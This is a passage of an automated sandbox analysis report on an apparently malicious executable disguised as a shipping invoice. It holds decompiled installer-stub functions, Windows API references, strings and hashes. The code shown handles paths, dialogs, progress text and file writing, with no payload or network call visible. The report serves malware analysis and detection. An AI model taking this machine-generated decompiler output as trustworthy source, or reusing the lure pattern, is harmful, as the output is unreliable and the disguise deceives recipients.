                                                                                                                                    • GlobalFree.KERNEL32 ref: 00405F33
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405F3A
                                                                                                                                      • Part of subcall function 00405CFF: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405D03
                                                                                                                                      • Part of subcall function 00405CFF: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D25
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                                                    • Opcode ID: 2c940d09fa256aeebfe4a19b4703d07082a790d8a2d92a4b592a3db9a957e8a2
                                                                                                                                    • Instruction ID: 05b6362dc2488e262faedbf79d328ada9dd6fef7860b966caa5704833f821d8d
                                                                                                                                    • Opcode Fuzzy Hash: 2c940d09fa256aeebfe4a19b4703d07082a790d8a2d92a4b592a3db9a957e8a2
                                                                                                                                    • Instruction Fuzzy Hash: 03311231604B16ABD2206B65AD89F6B3A5CDF45754F14043AFA41FA2C2DE7CE8018FBD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004063D0(CHAR* _a4) {
                                                                                                                                    				char _t5;
                                                                                                                                    				char _t7;
                                                                                                                                    				char* _t15;
                                                                                                                                    				char* _t16;
                                                                                                                                    				CHAR* _t17;
                                                                                                                                    
                                                                                                                                    				_t17 = _a4;
                                                                                                                                    				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                                    					_t17 =  &(_t17[4]);
                                                                                                                                    				}
                                                                                                                                    				if( *_t17 != 0 && E00405B6B(_t17) != 0) {
                                                                                                                                    					_t17 =  &(_t17[2]);
                                                                                                                                    				}
                                                                                                                                    				_t5 =  *_t17;
                                                                                                                                    				_t15 = _t17;
                                                                                                                                    				_t16 = _t17;
                                                                                                                                    				if(_t5 != 0) {
                                                                                                                                    					do {
                                                                                                                                    						if(_t5 > 0x1f &&  *((char*)(E00405B29("*?|<>/\":", _t5))) == 0) {
                                                                                                                                    							E00405CBA(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                    						}
                                                                                                                                    						_t17 = CharNextA(_t17);
                                                                                                                                    						_t5 =  *_t17;
                                                                                                                                    					} while (_t5 != 0);
                                                                                                                                    				}
                                                                                                                                    				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t16 = CharPrevA(_t15, _t16);
                                                                                                                                    					_t7 =  *_t16;
                                                                                                                                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                    					if(_t15 < _t16) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					break;
                                                                                                                                    				}
                                                                                                                                    				return _t7;
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00406428
                                                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406435
                                                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040643A
                                                                                                                                    • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040644A
                                                                                                                                    Strings
                                                                                                                                    • *?|<>/":, xrefs: 00406418
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D1
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 0040640C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-3931316373
                                                                                                                                    • Opcode ID: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                                                                                                    • Instruction ID: 0715c2fc3524d0a0446df48179311655e74bc707a7934f7eacdad72b1a400285
                                                                                                                                    • Opcode Fuzzy Hash: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                                                                                                    • Instruction Fuzzy Hash: BB1134218047A029FB3207391C44B777F988B56760F59407FE8C2722C2DA7C5C6292AD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                    				struct tagLOGBRUSH _v16;
                                                                                                                                    				long _t39;
                                                                                                                                    				long _t41;
                                                                                                                                    				void* _t44;
                                                                                                                                    				signed char _t50;
                                                                                                                                    				long* _t54;
                                                                                                                                    
                                                                                                                                    				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                    					L18:
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                                    					goto L18;
                                                                                                                                    				} else {
                                                                                                                                    					_t50 = _t54[5];
                                                                                                                                    					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                                    						goto L18;
                                                                                                                                    					}
                                                                                                                                    					_t39 =  *_t54;
                                                                                                                                    					if((_t50 & 0x00000002) != 0) {
                                                                                                                                    						_t39 = GetSysColor(_t39);
                                                                                                                                    					}
                                                                                                                                    					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                                    						SetTextColor(_a8, _t39);
                                                                                                                                    					}
                                                                                                                                    					SetBkMode(_a8, _t54[4]);
                                                                                                                                    					_t41 = _t54[1];
                                                                                                                                    					_v16.lbColor = _t41;
                                                                                                                                    					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                                    						_t41 = GetSysColor(_t41);
                                                                                                                                    						_v16.lbColor = _t41;
                                                                                                                                    					}
                                                                                                                                    					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                                    						SetBkColor(_a8, _t41);
                                                                                                                                    					}
                                                                                                                                    					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                                    						_v16.lbStyle = _t54[2];
                                                                                                                                    						_t44 = _t54[3];
                                                                                                                                    						if(_t44 != 0) {
                                                                                                                                    							DeleteObject(_t44);
                                                                                                                                    						}
                                                                                                                                    						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                                    					}
                                                                                                                                    					return _t54[3];
                                                                                                                                    				}
                                                                                                                                    			}










                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                                                                                    • Instruction ID: 7b33ae707daf7c02fc8d9fa6ba248adc9fc5061c8cf9f9172a3d741643b49688
                                                                                                                                    • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                                                                                    • Instruction Fuzzy Hash: E02167716007049BCB309F78DA48B5B7BF4AF81715B04893EEED6A26E0C738D544CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040528D(CHAR* _a4, CHAR* _a8) {
                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				CHAR* _v32;
                                                                                                                                    				long _v44;
                                                                                                                                    				int _v48;
                                                                                                                                    				void* _v52;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				CHAR* _t26;
                                                                                                                                    				signed int _t27;
                                                                                                                                    				CHAR* _t28;
                                                                                                                                    				long _t29;
                                                                                                                                    				signed int _t39;
                                                                                                                                    
                                                                                                                                    				_t26 =  *0x42ec04; // 0x0
                                                                                                                                    				_v8 = _t26;
                                                                                                                                    				if(_t26 != 0) {
                                                                                                                                    					_t27 =  *0x42f4f4;
                                                                                                                                    					_v12 = _t27;
                                                                                                                                    					_t39 = _t27 & 0x00000001;
                                                                                                                                    					if(_t39 == 0) {
                                                                                                                                    						E00406188(0, _t39, 0x42a078, 0x42a078, _a4);
                                                                                                                                    					}
                                                                                                                                    					_t26 = lstrlenA(0x42a078);
                                                                                                                                    					_a4 = _t26;
                                                                                                                                    					if(_a8 == 0) {
                                                                                                                                    						L6:
                                                                                                                                    						if((_v12 & 0x00000004) == 0) {
                                                                                                                                    							_t26 = SetWindowTextA( *0x42ebe8, 0x42a078);
                                                                                                                                    						}
                                                                                                                                    						if((_v12 & 0x00000002) == 0) {
                                                                                                                                    							_v32 = 0x42a078;
                                                                                                                                    							_v52 = 1;
                                                                                                                                    							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                                    							_v44 = 0;
                                                                                                                                    							_v48 = _t29 - _t39;
                                                                                                                                    							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                                                    							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                                    						}
                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                    							_t28 = _a4;
                                                                                                                                    							 *((char*)(_t28 + 0x42a078)) = 0;
                                                                                                                                    							return _t28;
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                                    						if(_t26 < 0x800) {
                                                                                                                                    							_t26 = lstrcatA(0x42a078, _a8);
                                                                                                                                    							goto L6;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t26;
                                                                                                                                    			}


















                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                    • lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                    • lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                    • SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 38a218fa60d47ea0260b94fbc4af4e961fd8fac88371a7bd04fe7cbbd1b79051
                                                                                                                                    • Instruction ID: a52ee3f547af6adcee90036766ee5b5c0f447e9b7981664ca9c41ebf49496833
                                                                                                                                    • Opcode Fuzzy Hash: 38a218fa60d47ea0260b94fbc4af4e961fd8fac88371a7bd04fe7cbbd1b79051
                                                                                                                                    • Instruction Fuzzy Hash: 5721AE31900508BFDF019FA5CD8499EBFB9EF05354F14807AF904B6291C6798A848F98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00402D75(intOrPtr _a4) {
                                                                                                                                    				char _v68;
                                                                                                                                    				long _t6;
                                                                                                                                    				struct HWND__* _t7;
                                                                                                                                    				struct HWND__* _t15;
                                                                                                                                    
                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                    					_t15 =  *0x42944c; // 0x0
                                                                                                                                    					if(_t15 != 0) {
                                                                                                                                    						_t15 = DestroyWindow(_t15);
                                                                                                                                    					}
                                                                                                                                    					 *0x42944c = 0;
                                                                                                                                    					return _t15;
                                                                                                                                    				}
                                                                                                                                    				__eflags =  *0x42944c; // 0x0
                                                                                                                                    				if(__eflags != 0) {
                                                                                                                                    					return E0040653A(0);
                                                                                                                                    				}
                                                                                                                                    				_t6 = GetTickCount();
                                                                                                                                    				__eflags = _t6 -  *0x42f430;
                                                                                                                                    				if(_t6 >  *0x42f430) {
                                                                                                                                    					__eflags =  *0x42f428;
                                                                                                                                    					if( *0x42f428 == 0) {
                                                                                                                                    						_t7 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402CDD, 0);
                                                                                                                                    						 *0x42944c = _t7;
                                                                                                                                    						return ShowWindow(_t7, 5);
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *0x42f4f4 & 0x00000001;
                                                                                                                                    					if(( *0x42f4f4 & 0x00000001) != 0) {
                                                                                                                                    						wsprintfA( &_v68, "... %d%%", E00402D59());
                                                                                                                                    						return E0040528D(0,  &_v68);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t6;
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402D8D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DAB
                                                                                                                                    • wsprintfA.USER32 ref: 00402DD9
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DFD
                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E0B
                                                                                                                                      • Part of subcall function 00402D59: MulDiv.KERNEL32(0000E4ED,00000064,0000F65D), ref: 00402D6E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                    • String ID: ... %d%%
                                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                                    • Opcode ID: c853fd1e265afa3cc866d2ebb2e3d0702b28e63c8abd4db680c476409109ce13
                                                                                                                                    • Instruction ID: 26687e7c086addb943d178e474bac2d1c2e6eff041c2855ba1e9bf604ef82ccd
                                                                                                                                    • Opcode Fuzzy Hash: c853fd1e265afa3cc866d2ebb2e3d0702b28e63c8abd4db680c476409109ce13
                                                                                                                                    • Instruction Fuzzy Hash: E201A530501624EBCB217B61EF0CA9F7768AB00B09B94013BF905B11E0C7F849568BEE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00404B47(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                    				long _v8;
                                                                                                                                    				signed char _v12;
                                                                                                                                    				unsigned int _v16;
                                                                                                                                    				void* _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				long _v56;
                                                                                                                                    				void* _v60;
                                                                                                                                    				long _t15;
                                                                                                                                    				unsigned int _t19;
                                                                                                                                    				signed int _t25;
                                                                                                                                    				struct HWND__* _t28;
                                                                                                                                    
                                                                                                                                    				_t28 = _a4;
                                                                                                                                    				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                                    				if(_a8 == 0) {
                                                                                                                                    					L4:
                                                                                                                                    					_v56 = _t15;
                                                                                                                                    					_v60 = 4;
                                                                                                                                    					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                                    					return _v24;
                                                                                                                                    				}
                                                                                                                                    				_t19 = GetMessagePos();
                                                                                                                                    				_v16 = _t19 >> 0x10;
                                                                                                                                    				_v20 = _t19;
                                                                                                                                    				ScreenToClient(_t28,  &_v20);
                                                                                                                                    				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                                    				if((_v12 & 0x00000066) != 0) {
                                                                                                                                    					_t15 = _v8;
                                                                                                                                    					goto L4;
                                                                                                                                    				}
                                                                                                                                    				return _t25 | 0xffffffff;
                                                                                                                                    			}















                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404B62
                                                                                                                                    • GetMessagePos.USER32 ref: 00404B6A
                                                                                                                                    • ScreenToClient.USER32 ref: 00404B84
                                                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B96
                                                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404BBC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                                                                                    • Instruction ID: 2835013faa4ef8fe64ab50239a9af457afe7ab7af58273a41a41911e8f87aaae
                                                                                                                                    • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                                                                                    • Instruction Fuzzy Hash: 32015E71900218BAEB01DB94DD85FFEBBFCAF55711F10412BBA50B61D0C7B8A9458BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405753(CHAR* _a4) {
                                                                                                                                    				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                    				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                    				long _t23;
                                                                                                                                    
                                                                                                                                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                    				_v36.Owner = 0x40837c;
                                                                                                                                    				_v36.Group = 0x40837c;
                                                                                                                                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                    				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                    				_v36.Revision = 1;
                                                                                                                                    				_v36.Control = 4;
                                                                                                                                    				_v36.Dacl = 0x40836c;
                                                                                                                                    				_v16.nLength = 0xc;
                                                                                                                                    				if(CreateDirectoryA(_a4,  &_v16) != 0) {
                                                                                                                                    					L1:
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				_t23 = GetLastError();
                                                                                                                                    				if(_t23 == 0xb7) {
                                                                                                                                    					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					return GetLastError();
                                                                                                                                    				}
                                                                                                                                    				return _t23;
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405796
                                                                                                                                    • GetLastError.KERNEL32 ref: 004057AA
                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004057BF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004057C9
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00405753
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405779
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                    • API String ID: 3449924974-2028306314
                                                                                                                                    • Opcode ID: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                                                                                                    • Instruction ID: acb850f4e5650c60b34604d855087d035bcc6337fc3cb461114b9449d62d825b
                                                                                                                                    • Opcode Fuzzy Hash: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                                                                                                    • Instruction Fuzzy Hash: D0010871D10619EADF109FA4C944BEFBFB8EF14315F00403AE545B6280E7799608CFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00402CDD(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                    				char _v68;
                                                                                                                                    				void* _t11;
                                                                                                                                    				CHAR* _t19;
                                                                                                                                    
                                                                                                                                    				if(_a8 == 0x110) {
                                                                                                                                    					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                    					_a8 = 0x113;
                                                                                                                                    				}
                                                                                                                                    				if(_a8 == 0x113) {
                                                                                                                                    					_t11 = E00402D59();
                                                                                                                                    					_t19 = "unpacking data: %d%%";
                                                                                                                                    					if( *0x42f434 == 0) {
                                                                                                                                    						_t19 = "verifying installer: %d%%";
                                                                                                                                    					}
                                                                                                                                    					wsprintfA( &_v68, _t19, _t11);
                                                                                                                                    					SetWindowTextA(_a4,  &_v68);
                                                                                                                                    					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                                    				}
                                                                                                                                    				return 0;
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                                                                                                    • wsprintfA.USER32 ref: 00402D2C
                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402D3C
                                                                                                                                    • SetDlgItemTextA.USER32 ref: 00402D4E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                                    • Opcode ID: 36270f0bc33b1e087ec4713eac3c5c9b1e2a439cf011b77b38a90963d77698e8
                                                                                                                                    • Instruction ID: 33366aa7ac8bbaa6b0b87f425f220f6bc3ecfc2d6601bcd49114c331fc5b4eb1
                                                                                                                                    • Opcode Fuzzy Hash: 36270f0bc33b1e087ec4713eac3c5c9b1e2a439cf011b77b38a90963d77698e8
                                                                                                                                    • Instruction Fuzzy Hash: D3F0127150020DEBEF206F51DE1ABEE3769EB14345F40803AFA05B51D0DBF89D568B99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E004027A3(void* __ebx, void* __eflags) {
                                                                                                                                    				void* _t26;
                                                                                                                                    				long _t31;
                                                                                                                                    				void* _t45;
                                                                                                                                    				void* _t49;
                                                                                                                                    				void* _t51;
                                                                                                                                    				void* _t54;
                                                                                                                                    				void* _t55;
                                                                                                                                    				void* _t56;
                                                                                                                                    
                                                                                                                                    				_t45 = __ebx;
                                                                                                                                    				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                                                                    				_t50 = E00402B2C(0xfffffff0);
                                                                                                                                    				 *(_t56 - 0x4c) = _t23;
                                                                                                                                    				if(E00405B6B(_t50) == 0) {
                                                                                                                                    					E00402B2C(0xffffffed);
                                                                                                                                    				}
                                                                                                                                    				E00405CDA(_t50);
                                                                                                                                    				_t26 = E00405CFF(_t50, 0x40000000, 2);
                                                                                                                                    				 *(_t56 + 8) = _t26;
                                                                                                                                    				if(_t26 != 0xffffffff) {
                                                                                                                                    					_t31 =  *0x42f438;
                                                                                                                                    					 *(_t56 - 0x1c) = _t31;
                                                                                                                                    					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                                    					if(_t49 != _t45) {
                                                                                                                                    						E00403361(_t45);
                                                                                                                                    						E0040334B(_t49,  *(_t56 - 0x1c));
                                                                                                                                    						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x2c));
                                                                                                                                    						 *(_t56 - 0x10) = _t54;
                                                                                                                                    						if(_t54 != _t45) {
                                                                                                                                    							E004030DA(_t47,  *((intOrPtr*)(_t56 - 0x30)), _t45, _t54,  *(_t56 - 0x2c));
                                                                                                                                    							while( *_t54 != _t45) {
                                                                                                                                    								_t47 =  *_t54;
                                                                                                                                    								_t55 = _t54 + 8;
                                                                                                                                    								 *(_t56 - 0x48) =  *_t54;
                                                                                                                                    								E00405CBA( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                                    								_t54 = _t55 +  *(_t56 - 0x48);
                                                                                                                                    							}
                                                                                                                                    							GlobalFree( *(_t56 - 0x10));
                                                                                                                                    						}
                                                                                                                                    						E00405DA6( *(_t56 + 8), _t49,  *(_t56 - 0x1c));
                                                                                                                                    						GlobalFree(_t49);
                                                                                                                                    						 *((intOrPtr*)(_t56 - 0xc)) = E004030DA(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                                                                    					}
                                                                                                                                    					CloseHandle( *(_t56 + 8));
                                                                                                                                    				}
                                                                                                                                    				_t51 = 0xfffffff3;
                                                                                                                                    				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                                                                    					_t51 = 0xffffffef;
                                                                                                                                    					DeleteFileA( *(_t56 - 0x4c));
                                                                                                                                    					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                                    				}
                                                                                                                                    				_push(_t51);
                                                                                                                                    				E00401423();
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}












                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                                                                                    • GlobalFree.KERNEL32 ref: 0040284C
                                                                                                                                    • GlobalFree.KERNEL32 ref: 0040285F
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
